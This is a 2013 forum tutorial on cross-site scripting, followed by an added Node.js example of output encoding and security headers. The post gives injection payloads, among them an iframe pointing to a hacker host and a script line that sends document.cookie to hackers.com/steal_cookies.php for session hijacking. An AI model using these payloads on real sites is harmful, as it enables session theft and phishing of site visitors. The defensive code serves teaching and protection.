Ethical Experts
 Basics of XSS Hacking

Author: thedhruvsoni (Team IHA Admins)
Posted: Mon Oct 21, 2013 1:32 am
Cross-site scripting (popularly known as XSS) and SQL injection are two prominent vulnerabilities that have been responsible for a large number of security breaches in recent years. XSS is a huge problem at present because most web developers are not even aware of this kind of attack. The basic differences between SQL injection and XSS are:

SQL injection is the injection of SQL statements, whereas XSS is the injection of code (it can be JavaScript, PHP code, VB code or even regular HTML).
SQL injection injects a SQL statement into the query execution function of the server-side script, but XSS can be both client side and server side. (Stored or persistent XSS is server side, whereas non-persistent XSS is client side, as an attacker needs to insert the code each time.)

Together, XSS and SQL injection are the most deadly combination that can be found today, and more than 90% of sites are vulnerable to one of the two. In SQL injection, the user can add additional conditions or commands to a database query, thus allowing the user to bypass authentication or alter data. With XSS, an attacker can inject their own HTML (including JavaScript or other executable code) into a web page; this is exploitable in many ways, up to complete compromise of the browser. A phisher uses XSS to inject credential-stealing code into official sites without having to redirect the user to a copy of the site. This means that any security credentials will be valid on the attack site, and even white-listing will not prevent the attack.

So, let's see how an XSS attack actually takes place.

An XSS attack can be of many types:
Non-persistent or reflected
DOM-based or Local cross-site scripting
Stored or persistent

Now have a look at an example. Let's say that we have a vulnerable page. A malicious user, Hacker, posts a "special_code" post, containing the following:

<script type="text/javascript" src="http://victimwebsite.com/xss.js"></script>

If the page is vulnerable, then the browser of everyone who visits the page will fetch the file located at http://victimwebsite.com/xss.js and execute the code in it.

How to find if a website is vulnerable to XSS?

To find out if a website is vulnerable to XSS, all you need to do is insert the following script into any search or text input field.

<script>alert("hi");</script>

If, upon submitting, the page returns an alert with "hi" in it, then that particular website should be vulnerable to an XSS attack.

Now you can insert a link to any third-party website or fake login page in the script tag, and that link gets stored with the original content. We can also insert links to JavaScript files, which allow the hacker to run the malicious code they contain when the page reloads and basically hijack the session of any user accessing that particular page. Session hijacking means that the hacker can now log in to the website without even having the victim's username or password. This is done by inserting cookie-stealing code in the JavaScript.

We can insert a link to any image into the vulnerable website by entering the following script in a search or text input field that is vulnerable to XSS.

<iframe src="url of the fake page" width="1000" height="1000" />

It can be anything like:

<iframe src="http://www.hacker.com/hacked.jpg" width="1000" height="1000" />

One can also paste pages into the victim website:

<script>document.location.href="http://www.hackers.com/steal_cookies.php"+document.cookie; </script>

Hope you enjoyed this and learnt a lot.
Happy Hacking!
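
The post shows markup typed into a search or input field being parsed as part of the page. The following is an added example, not part of the original post: a dependency-free Node.js sketch that renders the post's inputs once by plain concatenation and once with output encoding, and builds the response headers that limit the cookie-theft case. All function names (escapeHtml, renderUnsafe, renderSafe, hardenedHeaders, containsActiveTag) and the cookie name sid are assumptions made for illustration.

```javascript
// Added example: server-side rendering of a search page (Node.js, no dependencies).
// All function names and the cookie name "sid" are hypothetical.

// Encode the five characters that let text break out of HTML element
// content or a quoted attribute value.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: the query is concatenated into the markup as-is, so any tag
// in it becomes part of the page.
function renderUnsafe(query) {
  return `<p>Results for: ${query}</p>`;
}

// Hardened: the query is encoded at the point of output, so the browser
// displays it as text instead of parsing it as markup.
function renderSafe(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// Defence in depth for the session-hijacking case: HttpOnly hides the cookie
// from document.cookie, and the CSP refuses inline scripts, third-party
// scripts and frames even if an encoding step is missed somewhere.
function hardenedHeaders(sessionId) {
  return {
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; frame-src 'none'; object-src 'none'",
    'Set-Cookie': `sid=${encodeURIComponent(sessionId)}; HttpOnly; Secure; SameSite=Lax; Path=/`,
  };
}

// True when the rendered page contains a live <script> or <iframe> tag.
function containsActiveTag(html) {
  return /<\s*(script|iframe)\b/i.test(html);
}

// Inputs taken from the post above (quotes normalised to straight quotes).
const samples = [
  '<script>alert("hi");</script>',
  '<script type="text/javascript" src="http://victimwebsite.com/xss.js"></script>',
  '<iframe src="http://www.hacker.com/hacked.jpg" width="1000" height="1000" />',
];

for (const s of samples) {
  console.log(containsActiveTag(renderUnsafe(s)), containsActiveTag(renderSafe(s)));
}
```

Encoding has to match the output context: this helper covers element content and quoted attribute values, not values written into a script block or a URL.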